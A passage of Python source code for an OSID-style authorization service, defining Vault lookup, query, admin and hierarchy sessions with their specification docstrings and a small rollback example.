self.unassign_authorization_from_vault(authorization_id, to_vault_id)
raise
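# A standalone sketch of the assign-then-unassign rollback idiom used by
# ``reassign_authorization_to_vault`` above, reduced to an in-memory dict of
# sets so it runs without a catalog backend; nothing here touches real sessions.
def _example_reassign(mappings, authorization_id, from_vault_id, to_vault_id):
    mappings.setdefault(to_vault_id, set()).add(authorization_id)  # assign first
    try:
        mappings[from_vault_id].remove(authorization_id)  # KeyError if unmapped
    except KeyError:
        mappings[to_vault_id].discard(authorization_id)  # roll back new mapping
        raise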
class VaultLookupSession(abc_authorization_sessions.VaultLookupSession, osid_sessions.OsidSession):
"""This session provides methods for retrieving ``Vault`` objects.
The ``Vault`` represents a collection of ``Functions`` and
``Authorizations``.
This session defines views that offer differing behaviors when
retrieving multiple objects.
* comparative view: elements may be silently omitted or re-ordered
* plenary view: provides a complete set or is an error condition
Generally, the comparative view should be used for most applications
as it permits operation even if there is data that cannot be
accessed. For example, a browsing application may only need to
examine the ``Vaults`` it can access, without breaking execution.
However, an administrative application may require all ``Vault``
elements to be available.
    Vaults may have additional records indicated by their respective
record types. The record may not be accessed through a cast of the
``Vault``.
"""
_session_namespace = 'authorization.VaultLookupSession'
def __init__(self, proxy=None, runtime=None, **kwargs):
OsidSession.__init__(self)
OsidSession._init_catalog(self, proxy, runtime)
if self._cataloging_manager is not None:
self._catalog_session = self._cataloging_manager.get_catalog_lookup_session()
self._catalog_session.use_comparative_catalog_view()
self._catalog_view = COMPARATIVE
self._kwargs = kwargs
def can_lookup_vaults(self):
"""Tests if this user can perform ``Vault`` lookups.
A return of true does not guarantee successful authorization. A
return of false indicates that it is known all methods in this
session will result in a ``PermissionDenied``. This is intended
as a hint to an application that may opt not to offer lookup
operations to unauthorized users.
return: (boolean) - ``false`` if lookup methods are not
authorized, ``true`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinLookupSession.can_lookup_bins
# NOTE: It is expected that real authentication hints will be
# handled in a service adapter above the pay grade of this impl.
if self._catalog_session is not None:
return self._catalog_session.can_lookup_catalogs()
return True
def use_comparative_vault_view(self):
"""The returns from the lookup methods may omit or translate elements based on this session, such as authorization, and not result in an error.
This view is used when greater interoperability is desired at
the expense of precision.
        *compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinLookupSession.use_comparative_bin_view
self._catalog_view = COMPARATIVE
if self._catalog_session is not None:
self._catalog_session.use_comparative_catalog_view()
def use_plenary_vault_view(self):
"""A complete view of the ``Vault`` returns is desired.
Methods will return what is requested or result in an error.
This view is used when greater precision is desired at the
expense of interoperability.
        *compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinLookupSession.use_plenary_bin_view
self._catalog_view = PLENARY
if self._catalog_session is not None:
self._catalog_session.use_plenary_catalog_view()
@utilities.arguments_not_none
def get_vault(self, vault_id):
"""Gets the ``Vault`` specified by its ``Id``.
In plenary mode, the exact ``Id`` is found or a ``NotFound``
results. Otherwise, the returned ``Vault`` may have a different
``Id`` than requested, such as the case where a duplicate ``Id``
was assigned to a ``Vault`` and retained for compatibility.
arg: vault_id (osid.id.Id): ``Id`` of the ``Vault``
return: (osid.authorization.Vault) - the vault
raise: NotFound - ``vault_id`` not found
raise: NullArgument - ``vault_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
        *compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinLookupSession.get_bin
if self._catalog_session is not None:
return self._catalog_session.get_catalog(catalog_id=vault_id)
collection = JSONClientValidated('authorization',
collection='Vault',
runtime=self._runtime)
# Need to consider how to best deal with the "phantom root" catalog issue
if vault_id.get_identifier() == PHANTOM_ROOT_IDENTIFIER:
return self._get_phantom_root_catalog(cat_class=objects.Vault, cat_name='Vault')
try:
result = collection.find_one({'_id': ObjectId(self._get_id(vault_id, 'authorization').get_identifier())})
except errors.NotFound:
# Try creating an orchestrated Vault. Let it raise errors.NotFound()
result = self._create_orchestrated_cat(vault_id, 'authorization', 'Vault')
return objects.Vault(osid_object_map=result, runtime=self._runtime, proxy=self._proxy)
@utilities.arguments_not_none
def get_vaults_by_ids(self, vault_ids):
"""Gets a ``VaultList`` corresponding to the given ``IdList``.
In plenary mode, the returned list contains all of the vaults
specified in the ``Id`` list, in the order of the list,
including duplicates, or an error results if an ``Id`` in the
supplied list is not found or inaccessible. Otherwise,
inaccessible ``Vault`` objects may be omitted from the list and
may present the elements in any order including returning a
unique set.
arg: vault_ids (osid.id.IdList): the list of ``Ids`` to
retrieve
return: (osid.authorization.VaultList) - the returned ``Vault``
list
        raise: NotFound - an ``Id`` was not found
raise: NullArgument - ``vault_ids`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinLookupSession.get_bins_by_ids_template
# NOTE: This implementation currently ignores plenary view
# Also, this should be implemented to use get_Vault() instead of direct to database
if self._catalog_session is not None:
return self._catalog_session.get_catalogs_by_ids(catalog_ids=vault_ids)
catalog_id_list = []
for i in vault_ids:
catalog_id_list.append(ObjectId(i.get_identifier()))
collection = JSONClientValidated('authorization',
collection='Vault',
runtime=self._runtime)
result = collection.find({'_id': {'$in': catalog_id_list}}).sort('_id', DESCENDING)
return objects.VaultList(result, runtime=self._runtime, proxy=self._proxy)
@utilities.arguments_not_none
def get_vaults_by_genus_type(self, vault_genus_type):
"""Gets a ``VaultList`` corresponding to the given vault genus ``Type`` which does not include vaults of types derived from the specified ``Type``.
In plenary mode, the returned list contains all known vaults or
an error results. Otherwise, the returned list may contain only
those vaults that are accessible through this session.
arg: vault_genus_type (osid.type.Type): a vault genus type
return: (osid.authorization.VaultList) - the returned ``Vault``
list
raise: NullArgument - ``vault_genus_type`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
collection = JSONClientValidated('authorization',
collection='Vault',
runtime=self._runtime)
result = collection.find({'genusTypeId': {'$in': [str(vault_genus_type)]}}).sort('_id', DESCENDING)
return objects.VaultList(result, runtime=self._runtime)
@utilities.arguments_not_none
def get_vaults_by_parent_genus_type(self, vault_genus_type):
"""Gets a ``VaultList`` corresponding to the given vault genus ``Type`` and include any additional vaults with genus types derived from the specified ``Type``.
In plenary mode, the returned list contains all known vaults or
an error results. Otherwise, the returned list may contain only
those vaults that are accessible through this session.
arg: vault_genus_type (osid.type.Type): a vault genus type
return: (osid.authorization.VaultList) - the returned ``Vault``
list
raise: NullArgument - ``vault_genus_type`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
@utilities.arguments_not_none
def get_vaults_by_record_type(self, vault_record_type):
"""Gets a ``VaultList`` containing the given vault record ``Type``.
In plenary mode, the returned list contains all known vaults or
an error results. Otherwise, the returned list may contain only
those vaults that are accessible through this session.
arg: vault_record_type (osid.type.Type): a vault record type
return: (osid.authorization.VaultList) - the returned ``Vault``
list
raise: NullArgument - ``vault_record_type`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
@utilities.arguments_not_none
def get_vaults_by_provider(self, resource_id):
"""Gets a ``VaultList`` from the given provider ````.
In plenary mode, the returned list contains all known vaults or
an error results. Otherwise, the returned list may contain only
those vaults that are accessible through this session.
arg: resource_id (osid.id.Id): a resource ``Id``
return: (osid.authorization.VaultList) - the returned ``Vault``
list
raise: NullArgument - ``resource_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def get_vaults(self):
"""Gets all ``Vaults``.
In plenary mode, the returned list contains all known vaults or
an error results. Otherwise, the returned list may contain only
those vaults that are accessible through this session.
return: (osid.authorization.VaultList) - a ``VaultList``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinLookupSession.get_bins_template
# NOTE: This implementation currently ignores plenary view
if self._catalog_session is not None:
return self._catalog_session.get_catalogs()
collection = JSONClientValidated('authorization',
collection='Vault',
runtime=self._runtime)
result = collection.find().sort('_id', DESCENDING)
return objects.VaultList(result, runtime=self._runtime, proxy=self._proxy)
vaults = property(fget=get_vaults)
class VaultQuerySession(abc_authorization_sessions.VaultQuerySession, osid_sessions.OsidSession):
"""This session provides methods for searching among ``Vault`` objects.
The search query is constructed using the ``VaultQuery``.
Vaults may have a query record indicated by their respective record
types. The query record is accessed via the ``VaultQuery``.
"""
_session_namespace = 'authorization.VaultQuerySession'
def __init__(self, proxy=None, runtime=None, **kwargs):
OsidSession.__init__(self)
OsidSession._init_catalog(self, proxy, runtime)
if self._cataloging_manager is not None:
self._catalog_session = self._cataloging_manager.get_catalog_query_session()
self._forms = dict()
self._kwargs = kwargs
def can_search_vaults(self):
"""Tests if this user can perform ``Vault`` searches.
A return of true does not guarantee successful authorization. A
return of false indicates that it is known all methods in this
session will result in a ``PermissionDenied``. This is intended
as a hint to an application that may opt not to offer search
operations to unauthorized users.
return: (boolean) - ``false`` if search methods are not
authorized, ``true`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinQuerySession.can_search_bins_template
# NOTE: It is expected that real authentication hints will be
# handled in a service adapter above the pay grade of this impl.
return True
def get_vault_query(self):
"""Gets a vault query.
return: (osid.authorization.VaultQuery) - a vault query
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinQuerySession.get_bin_query_template
return queries.VaultQuery(runtime=self._runtime)
vault_query = property(fget=get_vault_query)
@utilities.arguments_not_none
def get_vaults_by_query(self, vault_query):
"""Gets a list of ``Vault`` objects matching the given search.
arg: vault_query (osid.authorization.VaultQuery): the vault
query
return: (osid.authorization.VaultList) - the returned
``VaultList``
raise: NullArgument - ``vault_query`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
raise: Unsupported - ``vault_query`` is not of this service
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinQuerySession.get_bins_by_query_template
if self._catalog_session is not None:
return self._catalog_session.get_catalogs_by_query(vault_query)
query_terms = dict(vault_query._query_terms)
collection = JSONClientValidated('authorization',
collection='Vault',
runtime=self._runtime)
result = collection.find(query_terms).sort('_id', DESCENDING)
return objects.VaultList(result, runtime=self._runtime)
class VaultAdminSession(abc_authorization_sessions.VaultAdminSession, osid_sessions.OsidSession):
"""This session creates, updates, and deletes ``Vaults``.
The data for create and update is provided by the consumer via the
form object. ``OsidForms`` are requested for each create or update
and may not be reused.
Create and update operations differ in their usage. To create a
``Vault,`` a ``VaultForm`` is requested using
``get_vault_form_for_create()`` specifying the desired record
``Types`` or none if no record ``Types`` are needed. The returned
``VaultForm`` will indicate that it is to be used with a create
    operation and can be used to examine metadata or validate data prior
    to creation. Once the ``VaultForm`` is submitted to a create
operation, it cannot be reused with another create operation unless
the first operation was unsuccessful. Each ``VaultForm`` corresponds
to an attempted transaction.
For updates, ``VaultForms`` are requested to the ``Vault`` ``Id``
that is to be updated using ``getVaultFormForUpdate()``. Similarly,
the ``VaultForm`` has metadata about the data that can be updated
and it can perform validation before submitting the update. The
``VaultForm`` can only be used once for a successful update and
cannot be reused.
The delete operations delete ``Vaults``. It is safer to remove all
mappings to the ``Vault`` catalogs before deletion.
This session includes an ``Id`` aliasing mechanism to assign an
external ``Id`` to an internally assigned Id.
"""
_session_namespace = 'authorization.VaultAdminSession'
def __init__(self, proxy=None, runtime=None, **kwargs):
OsidSession.__init__(self)
OsidSession._init_catalog(self, proxy, runtime)
if self._cataloging_manager is not None:
self._catalog_session = self._cataloging_manager.get_catalog_admin_session()
self._forms = dict()
self._kwargs = kwargs
def can_create_vaults(self):
"""Tests if this user can create ``Vaults``.
A return of true does not guarantee successful authorization. A
return of false indicates that it is known creating a ``Vault``
will result in a ``PermissionDenied``. This is intended as a
hint to an application that may not wish to offer create
operations to unauthorized users.
return: (boolean) - ``false`` if ``Vault`` creation is not
authorized, ``true`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinAdminSession.can_create_bins
# NOTE: It is expected that real authentication hints will be
# handled in a service adapter above the pay grade of this impl.
if self._catalog_session is not None:
return self._catalog_session.can_create_catalogs()
return True
@utilities.arguments_not_none
def can_create_vault_with_record_types(self, vault_record_types):
"""Tests if this user can create a single ``Vault`` using the desired record types.
While ``AuthorizationManager.getVaultRecordTypes()`` can be used
to examine which records are supported, this method tests which
record(s) are required for creating a specific ``Vault``.
Providing an empty array tests if a ``Vault`` can be created
with no records.
arg: vault_record_types (osid.type.Type[]): array of vault
record types
return: (boolean) - ``true`` if ``Vault`` creation using the
specified ``Types`` is supported, ``false`` otherwise
raise: NullArgument - ``vault_record_types`` is ``null``
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinAdminSession.can_create_bin_with_record_types
# NOTE: It is expected that real authentication hints will be
# handled in a service adapter above the pay grade of this impl.
if self._catalog_session is not None:
return self._catalog_session.can_create_catalog_with_record_types(catalog_record_types=vault_record_types)
return True
@utilities.arguments_not_none
def get_vault_form_for_create(self, vault_record_types):
"""Gets the vault form for creating new vaults.
A new form should be requested for each create transaction.
arg: vault_record_types (osid.type.Type[]): array of vault
record types
return: (osid.authorization.VaultForm) - the vault form
raise: NullArgument - ``vault_record_types`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
        raise: Unsupported - unable to get form with requested record
types
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinAdminSession.get_bin_form_for_create_template
if self._catalog_session is not None:
return self._catalog_session.get_catalog_form_for_create(catalog_record_types=vault_record_types)
for arg in vault_record_types:
if not isinstance(arg, ABCType):
raise errors.InvalidArgument('one or more argument array elements is not a valid OSID Type')
if vault_record_types == []:
result = objects.VaultForm(
runtime=self._runtime,
effective_agent_id=self.get_effective_agent_id(),
proxy=self._proxy) # Probably don't need effective agent id now that we have proxy in form.
else:
result = objects.VaultForm(
record_types=vault_record_types,
runtime=self._runtime,
effective_agent_id=self.get_effective_agent_id(),
proxy=self._proxy) # Probably don't need effective agent id now that we have proxy in form.
self._forms[result.get_id().get_identifier()] = not CREATED
return result
@utilities.arguments_not_none
def create_vault(self, vault_form):
"""Creates a new ``Vault``.
arg: vault_form (osid.authorization.VaultForm): the form for
this ``Vault``
return: (osid.authorization.Vault) - the new ``Vault``
raise: IllegalState - ``vault_form`` already used in a create
transaction
raise: InvalidArgument - one or more of the form elements is
invalid
raise: NullArgument - ``vault_form`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
raise: Unsupported - ``vault_form`` did not originate from
``get_vault_form_for_create()``
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinAdminSession.create_bin_template
if self._catalog_session is not None:
return self._catalog_session.create_catalog(catalog_form=vault_form)
collection = JSONClientValidated('authorization',
collection='Vault',
runtime=self._runtime)
if not isinstance(vault_form, ABCVaultForm):
raise errors.InvalidArgument('argument type is not an VaultForm')
if vault_form.is_for_update():
raise errors.InvalidArgument('the VaultForm is for update only, not create')
try:
if self._forms[vault_form.get_id().get_identifier()] == CREATED:
raise errors.IllegalState('vault_form already used in a create transaction')
except KeyError:
raise errors.Unsupported('vault_form did not originate from this session')
if not vault_form.is_valid():
raise errors.InvalidArgument('one or more of the form elements is invalid')
insert_result = collection.insert_one(vault_form._my_map)
self._forms[vault_form.get_id().get_identifier()] = CREATED
result = objects.Vault(
osid_object_map=collection.find_one({'_id': insert_result.inserted_id}),
runtime=self._runtime,
proxy=self._proxy)
return result
def can_update_vaults(self):
"""Tests if this user can update ``Vaults``.
A return of true does not guarantee successful authorization. A
return of false indicates that it is known updating a ``Vault``
will result in a ``PermissionDenied``. This is intended as a
hint to an application that may not wish to offer update
operations to unauthorized users.
return: (boolean) - ``false`` if ``Vault`` modification is not
authorized, ``true`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinAdminSession.can_update_bins
# NOTE: It is expected that real authentication hints will be
# handled in a service adapter above the pay grade of this impl.
if self._catalog_session is not None:
return self._catalog_session.can_update_catalogs()
return True
@utilities.arguments_not_none
def get_vault_form_for_update(self, vault_id):
"""Gets the vault form for updating an existing vault.
A new vault form should be requested for each update
transaction.
arg: vault_id (osid.id.Id): the ``Id`` of the ``Vault``
return: (osid.authorization.VaultForm) - the vault form
raise: NotFound - ``vault_id`` is not found
raise: NullArgument - ``vault_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinAdminSession.get_bin_form_for_update_template
if self._catalog_session is not None:
return self._catalog_session.get_catalog_form_for_update(catalog_id=vault_id)
collection = JSONClientValidated('authorization',
collection='Vault',
runtime=self._runtime)
if not isinstance(vault_id, ABCId):
raise errors.InvalidArgument('the argument is not a valid OSID Id')
result = collection.find_one({'_id': ObjectId(vault_id.get_identifier())})
cat_form = objects.VaultForm(osid_object_map=result, runtime=self._runtime, proxy=self._proxy)
self._forms[cat_form.get_id().get_identifier()] = not UPDATED
return cat_form
@utilities.arguments_not_none
def update_vault(self, vault_form):
"""Updates an existing vault.
arg: vault_form (osid.authorization.VaultForm): the form
containing the elements to be updated
raise: IllegalState - ``vault_form`` already used in an update
transaction
raise: InvalidArgument - the form contains an invalid value
raise: NullArgument - ``vault_form`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
raise: Unsupported - ``vault_form`` did not originate from
``get_vault_form_for_update()``
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinAdminSession.update_bin_template
if self._catalog_session is not None:
return self._catalog_session.update_catalog(catalog_form=vault_form)
collection = JSONClientValidated('authorization',
collection='Vault',
runtime=self._runtime)
if not isinstance(vault_form, ABCVaultForm):
raise errors.InvalidArgument('argument type is not an VaultForm')
if not vault_form.is_for_update():
            raise errors.InvalidArgument('the VaultForm is for create only, not update')
try:
if self._forms[vault_form.get_id().get_identifier()] == UPDATED:
raise errors.IllegalState('vault_form already used in an update transaction')
except KeyError:
raise errors.Unsupported('vault_form did not originate from this session')
if not vault_form.is_valid():
raise errors.InvalidArgument('one or more of the form elements is invalid')
collection.save(vault_form._my_map) # save is deprecated - change to replace_one
self._forms[vault_form.get_id().get_identifier()] = UPDATED
# Note: this is out of spec. The OSIDs don't require an object to be returned
return objects.Vault(osid_object_map=vault_form._my_map, runtime=self._runtime, proxy=self._proxy)
def can_delete_vaults(self):
"""Tests if this user can delete vaults.
A return of true does not guarantee successful authorization. A
return of false indicates that it is known deleting a ``Vault``
will result in a ``PermissionDenied``. This is intended as a
hint to an application that may not wish to offer delete
operations to unauthorized users.
return: (boolean) - ``false`` if ``Vault`` deletion is not
authorized, ``true`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinAdminSession.can_delete_bins
# NOTE: It is expected that real authentication hints will be
# handled in a service adapter above the pay grade of this impl.
if self._catalog_session is not None:
return self._catalog_session.can_delete_catalogs()
return True
@utilities.arguments_not_none
def delete_vault(self, vault_id):
"""Deletes a ``Vault``.
arg: vault_id (osid.id.Id): the ``Id`` of the ``Vault`` to
remove
raise: NotFound - ``vault_id`` not found
raise: NullArgument - ``vault_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinAdminSession.delete_bin_template
if self._catalog_session is not None:
return self._catalog_session.delete_catalog(catalog_id=vault_id)
collection = JSONClientValidated('authorization',
collection='Vault',
runtime=self._runtime)
if not isinstance(vault_id, ABCId):
raise errors.InvalidArgument('the argument is not a valid OSID Id')
for object_catalog in ['Authorization', 'Function', 'Qualifier', 'Vault']:
obj_collection = JSONClientValidated('authorization',
collection=object_catalog,
runtime=self._runtime)
if obj_collection.find({'assignedVaultIds': {'$in': [str(vault_id)]}}).count() != 0:
raise errors.IllegalState('catalog is not empty')
collection.delete_one({'_id': ObjectId(vault_id.get_identifier())})
def can_manage_vault_aliases(self):
"""Tests if this user can manage ``Id`` aliases for ``Vaults``.
A return of true does not guarantee successful authorization. A
return of false indicates that it is known changing an alias
will result in a ``PermissionDenied``. This is intended as a
hint to an application that may opt not to offer alias
operations to an unauthorized user.
return: (boolean) - ``false`` if ``Vault`` aliasing is not
authorized, ``true`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
# NOTE: It is expected that real authentication hints will be
# handled in a service adapter above the pay grade of this impl.
return True
@utilities.arguments_not_none
def alias_vault(self, vault_id, alias_id):
"""Adds an ``Id`` to a ``Vault`` for the purpose of creating compatibility.
The primary ``Id`` of the ``Vault`` is determined by the
provider. The new ``Id`` performs as an alias to the primary
``Id``. If the alias is a pointer to another vault it is
reassigned to the given vault ``Id``.
arg: vault_id (osid.id.Id): the ``Id`` of a ``Vault``
arg: alias_id (osid.id.Id): the alias ``Id``
raise: AlreadyExists - ``alias_id`` is already assigned
raise: NotFound - ``vault_id`` not found
raise: NullArgument - ``vault_id`` or ``alias_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinLookupSession.alias_bin_template
if self._catalog_session is not None:
return self._catalog_session.alias_catalog(catalog_id=vault_id, alias_id=alias_id)
self._alias_id(primary_id=vault_id, equivalent_id=alias_id)
class VaultHierarchySession(abc_authorization_sessions.VaultHierarchySession, osid_sessions.OsidSession):
"""This session defines methods for traversing a hierarchy of ``Vault`` objects.
Each node in the hierarchy is a unique ``Vault``. The hierarchy may
be traversed recursively to establish the tree structure through
``get_parent_vaults()`` and ``getChildVaults()``. To relate these
``Ids`` to another OSID, ``get_vault_nodes()`` can be used for
retrievals that can be used for bulk lookups in other OSIDs. Any
``Vault`` available in the Authorization OSID is known to this
hierarchy but does not appear in the hierarchy traversal until added
as a root node or a child of another node.
A user may not be authorized to traverse the entire hierarchy. Parts
of the hierarchy may be made invisible through omission from the
returns of ``get_parent_vaults()`` or ``get_child_vaults()`` in lieu
of a ``PermissionDenied`` error that may disrupt the traversal
through authorized pathways.
This session defines views that offer differing behaviors when
retrieving multiple objects.
* comparative view: vault elements may be silently omitted or re-
ordered
* plenary view: provides a complete set or is an error condition
"""
_session_namespace = 'authorization.VaultHierarchySession'
def __init__(self, proxy=None, runtime=None, **kwargs):
# Implemented from template for
# osid.resource.BinHierarchySession.init_template
OsidSession.__init__(self)
OsidSession._init_catalog(self, proxy, runtime)
self._forms = dict()
self._kwargs = kwargs
if self._cataloging_manager is not None:
self._catalog_session = self._cataloging_manager.get_catalog_hierarchy_session()
else:
hierarchy_mgr = self._get_provider_manager('HIERARCHY')
self._hierarchy_session = hierarchy_mgr.get_hierarchy_traversal_session_for_hierarchy(
Id(authority='AUTHORIZATION',
namespace='CATALOG',
identifier='VAULT'),
proxy=self._proxy)
def get_vault_hierarchy_id(self):
"""Gets the hierarchy ``Id`` associated with this session.
return: (osid.id.Id) - the hierarchy ``Id`` associated with this
session
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinHierarchySession.get_bin_hierarchy_id
if self._catalog_session is not None:
return self._catalog_session.get_catalog_hierarchy_id()
return self._hierarchy_session.get_hierarchy_id()
vault_hierarchy_id = property(fget=get_vault_hierarchy_id)
def get_vault_hierarchy(self):
"""Gets the hierarchy associated with this session.
return: (osid.hierarchy.Hierarchy) - the hierarchy associated
with this session
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinHierarchySession.get_bin_hierarchy
if self._catalog_session is not None:
return self._catalog_session.get_catalog_hierarchy()
return self._hierarchy_session.get_hierarchy()
vault_hierarchy = property(fget=get_vault_hierarchy)
def can_access_vault_hierarchy(self):
"""Tests if this user can perform hierarchy queries.
A return of true does not guarantee successful authorization. A
return of false indicates that it is known all methods in this
session will result in a ``PermissionDenied``. This is intended
as a hint to an application that may opt not to offer lookup
operations.
return: (boolean) - ``false`` if hierarchy traversal methods are
not authorized, ``true`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinHierarchySession.can_access_bin_hierarchy
# NOTE: It is expected that real authentication hints will be
# handled in a service adapter above the pay grade of this impl.
if self._catalog_session is not None:
return self._catalog_session.can_access_catalog_hierarchy()
return True
def use_comparative_vault_view(self):
"""The returns from the vault methods may omit or translate elements based on this session, such as authorization, and not result in an error.
This view is used when greater interoperability is desired at
the expense of precision.
        *compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinLookupSession.use_comparative_bin_view
self._catalog_view = COMPARATIVE
if self._catalog_session is not None:
self._catalog_session.use_comparative_catalog_view()
def use_plenary_vault_view(self):
"""A complete view of the ``Hierarchy`` returns is desired.
Methods will return what is requested or result in an error.
This view is used when greater precision is desired at the
expense of interoperability.
        *compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinLookupSession.use_plenary_bin_view
self._catalog_view = PLENARY
if self._catalog_session is not None:
self._catalog_session.use_plenary_catalog_view()
def get_root_vault_ids(self):
"""Gets the root vault ``Ids`` in this hierarchy.
return: (osid.id.IdList) - the root vault ``Ids``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinHierarchySession.get_root_bin_ids
if self._catalog_session is not None:
return self._catalog_session.get_root_catalog_ids()
return self._hierarchy_session.get_roots()
root_vault_ids = property(fget=get_root_vault_ids)
def get_root_vaults(self):
"""Gets the root vaults in this vault hierarchy.
return: (osid.authorization.VaultList) - the root vaults
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
        *compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinHierarchySession.get_root_bins
if self._catalog_session is not None:
return self._catalog_session.get_root_catalogs()
return VaultLookupSession(
self._proxy,
self._runtime).get_vaults_by_ids(list(self.get_root_vault_ids()))
root_vaults = property(fget=get_root_vaults)
@utilities.arguments_not_none
def has_parent_vaults(self, vault_id):
"""Tests if the ``Vault`` has any parents.
arg: vault_id (osid.id.Id): a vault ``Id``
return: (boolean) - ``true`` if the vault has parents, ``false``
otherwise
raise: NotFound - ``vault_id`` is not found
raise: NullArgument - ``vault_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinHierarchySession.has_parent_bins
if self._catalog_session is not None:
return self._catalog_session.has_parent_catalogs(catalog_id=vault_id)
return self._hierarchy_session.has_parents(id_=vault_id)
@utilities.arguments_not_none
def is_parent_of_vault(self, id_, vault_id):
"""Tests if an ``Id`` is a direct parent of a vault.
arg: id (osid.id.Id): an ``Id``
arg: vault_id (osid.id.Id): the ``Id`` of a vault
return: (boolean) - ``true`` if this ``id`` is a parent of
``vault_id,`` ``false`` otherwise
raise: NotFound - ``vault_id`` is not found
raise: NullArgument - ``id`` or ``vault_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
*implementation notes*: If ``id`` not found return ``false``.
"""
# Implemented from template for
# osid.resource.BinHierarchySession.is_parent_of_bin
if self._catalog_session is not None:
return self._catalog_session.is_parent_of_catalog(id_=id_, catalog_id=vault_id)
return self._hierarchy_session.is_parent(id_=vault_id, parent_id=id_)
@utilities.arguments_not_none
def get_parent_vault_ids(self, vault_id):
"""Gets the parent ``Ids`` of the given vault.
arg: vault_id (osid.id.Id): a vault ``Id``
return: (osid.id.IdList) - the parent ``Ids`` of the vault
raise: NotFound - ``vault_id`` is not found
raise: NullArgument - ``vault_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinHierarchySession.get_parent_bin_ids
if self._catalog_session is not None:
return self._catalog_session.get_parent_catalog_ids(catalog_id=vault_id)
return self._hierarchy_session.get_parents(id_=vault_id)
@utilities.arguments_not_none
def get_parent_vaults(self, vault_id):
"""Gets the parents of the given vault.
arg: vault_id (osid.id.Id): a vault ``Id``
return: (osid.authorization.VaultList) - the parents of the
vault
raise: NotFound - ``vault_id`` is not found
raise: NullArgument - ``vault_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinHierarchySession.get_parent_bins
if self._catalog_session is not None:
return self._catalog_session.get_parent_catalogs(catalog_id=vault_id)
return VaultLookupSession(
self._proxy,
self._runtime).get_vaults_by_ids(
list(self.get_parent_vault_ids(vault_id)))
@utilities.arguments_not_none
def is_ancestor_of_vault(self, id_, vault_id):
"""Tests if an ``Id`` is an ancestor of a vault.
arg: id (osid.id.Id): an ``Id``
arg: vault_id (osid.id.Id): the ``Id`` of a vault
return: (boolean) - ``true`` if this ``id`` is an ancestor of
``vault_id,`` ``false`` otherwise
raise: NotFound - ``vault_id`` is not found
raise: NullArgument - ``vault_id`` or ``id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
